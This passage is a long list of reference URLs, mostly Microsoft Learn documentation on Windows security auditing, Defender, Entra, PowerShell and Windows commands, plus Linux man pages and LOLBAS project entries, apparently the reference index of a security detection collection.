reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands\nhttps://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus\nhttps://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus\nhttps://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001\nhttps://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010\nhttps://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012\nhttps://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101\nhttps://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference\nhttps://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115\nhttps://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0\nhttps://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0\nhttps://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0\nhttps://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0\nhttps://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0\nhttps://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0\nhttps://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect\nhttps://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling\nhttps://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool\nhttps://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-consent\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-stopped-due-to-risk-based-consent\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#new-owner\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-administrator-roles\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#things-to-monitor\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#short-lived-accounts\nhttps://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nhttps://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles\nhttps://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role\nhttps://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management\nhttps://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation\nhttps://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance\nhttps://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-token\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-user-activity\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anonymous-ip-address\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#impossible-travel\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-browser\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-forwarding\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#token-issuer-anomaly\nhttps://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties\nhttps://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities\nhttps://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy\nhttps://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory\nhttps://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0\nhttps://learn.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/logfile/\nhttps://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview\nhttps://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide\nhttps://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\nhttps://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001\nhttps://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012\nhttps://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders\nhttps://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication\nhttps://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78\nhttps://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183\nhttps://learn.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings\nhttps://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps\nhttps://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer\nhttps://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps\nhttps://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps\nhttps://learn.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_arithmetic_operators?view=powershell-5.1\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-5.1\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.3\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.4\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.4\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.4\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.4\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.windows.servermanager.migration/uninstall-windowsfeature\nhttps://learn.microsoft.com/en-us/powershell/module/netsecurity/get-netfirewallrule?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/netsecurity/show-netfirewallrule?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3\nhttps://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services\nhttps://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services\nhttps://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script\nhttps://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic\nhttps://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4634\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4647\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4649\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4661\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4699\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4701\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4706\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4743\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4794\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5140\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6281\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6416\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6423\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd348773(v=ws.10)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)\nhttps://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\nhttps://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16\nhttps://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/livekd\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/procdump\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/psexec\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/psservice\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sdelete\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sysmon\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected\nhttps://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/kdc-event-16-27-des-encryption-disabled\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password\nhttps://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v\nhttps://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior\nhttps://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-threatseveritydefaultaction\nhttps://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options\nhttps://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace\nhttps://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax\nhttps://learn.microsoft.com/en-us/windows-hardware/drivers/taef/\nhttps://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse\nhttps://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell\nhttps://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/hostname\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nhttps://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers\nhttps://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies\nhttps://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection\nhttps://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization\nhttps://learn.microsoft.com/en-us/windows/client-management/manage-recall\nhttps://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support\nhttps://learn.microsoft.com/en-us/windows/msix/package/package-support-framework\nhttps://learn.microsoft.com/en-us/windows/msix/package/unsigned-package\nhttps://learn.microsoft.com/en-us/windows/package-manager/winget/source\nhttps://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/appcontrol-deployment-guide\nhttps://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-script\nhttps://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/using-event-viewer-with-applocker\nhttps://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac\nhttps://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\nhttps://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4732\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5038\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations\nhttps://learn.microsoft.com/en-us/windows/win32/adschema/attributes-all\nhttps://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps\nhttps://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump\nhttps://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver\nhttps://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand\nhttps://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa\nhttps://learn.microsoft.com/en-us/windows/win32/api/winevt/\nhttps://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\nhttps://learn.microsoft.com/en-us/windows/win32/cimwin32prov/delete-method-in-class-win32-service\nhttps://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key\nhttps://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers\nhttps://learn.microsoft.com/en-us/windows/win32/msi/event-logging\nhttps://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\nhttps://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system\nhttps://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control\nhttps://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language\nhttps://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings\nhttps://learn.microsoft.com/en-us/windows/win32/shell/app-registration\nhttps://learn.microsoft.com/en-us/windows/win32/shell/csidl\nhttps://learn.microsoft.com/en-us/windows/win32/shell/launch\nhttps://learn.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-\nhttps://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps\nhttps://learn.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture\nhttps://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista\nhttps://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp\nhttps://learn.microsoft.com/en-us/windows/wsl/install-on-server\nhttps://learn.microsoft.com/pt-br/windows/win32/secauthz/sid-strings\nhttps://liberty-shell.com/sec/2020/02/25/shim-persistence/\nhttps://linux-audit.com/systemd/faq/what-is-the-difference-between-systemctl-disable-and-systemctl-mask/\nhttps://linux.die.net/man/1/arecord\nhttps://linux.die.net/man/1/bash\nhttps://linux.die.net/man/1/chage\nhttps://linux.die.net/man/1/dd\nhttps://linux.die.net/man/1/import\nhttps://linux.die.net/man/1/truncate\nhttps://linux.die.net/man/1/wget\nhttps://linux.die.net/man/1/xclip\nhttps://linux.die.net/man/1/xwd\nhttps://linux.die.net/man/8/groupdel\nhttps://linux.die.net/man/8/insmod\nhttps://linux.die.net/man/8/pam_tty_audit\nhttps://linux.die.net/man/8/useradd\nhttps://linux.die.net/man/8/userdel\nhttps://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa\nhttps://linuxhint.com/uninstall-debian-packages/\nhttps://linuxhint.com/uninstall_yum_package/\nhttps://linuxhint.com/view-tomcat-logs-windows/\nhttps://linuxize.com/post/how-to-delete-group-in-linux/\nhttps://lolbas-project.github.io\nhttps://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\nhttps://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/\nhttps://lolbas-project.github.io/lolbas/Binaries/Atbroker/\nhttps://lolbas-project.github.io/lolbas/Binaries/Bash/\nhttps://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\nhttps://lolbas-project.github.io/lolbas/Binaries/Certoc/\nhttps://lolbas-project.github.io/lolbas/Binaries/Certreq/\nhttps://lolbas-project.github.io/lolbas/Binaries/Certutil/\nhttps://lolbas-project.github.io/lolbas/Binaries/Cmdl32/\nhttps://lolbas-project.github.io/lolbas/Binaries/Cmstp/\nhttps://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/\nhttps://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/\nhttps://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/\nhttps://lolbas-project.github.io/lolbas/Binaries/Diantz/\nhttps://lolbas-project.github.io/lolbas/Binaries/Dnscmd/\nhttps://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute\nhttps://lolbas-project.github.io/lolbas/Binaries/Extexport/\nhttps://lolbas-project.github.io/lolbas/Binaries/Extrac32/\nhttps://lolbas-project.github.io/lolbas/Binaries/Findstr/\nhttps://lolbas-project.github.io/lolbas/Binaries/Forfiles/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ftp/\nhttps://lolbas-project.github.io/lolbas/Binaries/Gpscript/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ieexec/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ilasm/\nhttps://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/\nhttps://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/\nhttps://lolbas-project.github.io/lolbas/Binaries/Jsc/\nhttps://lolbas-project.g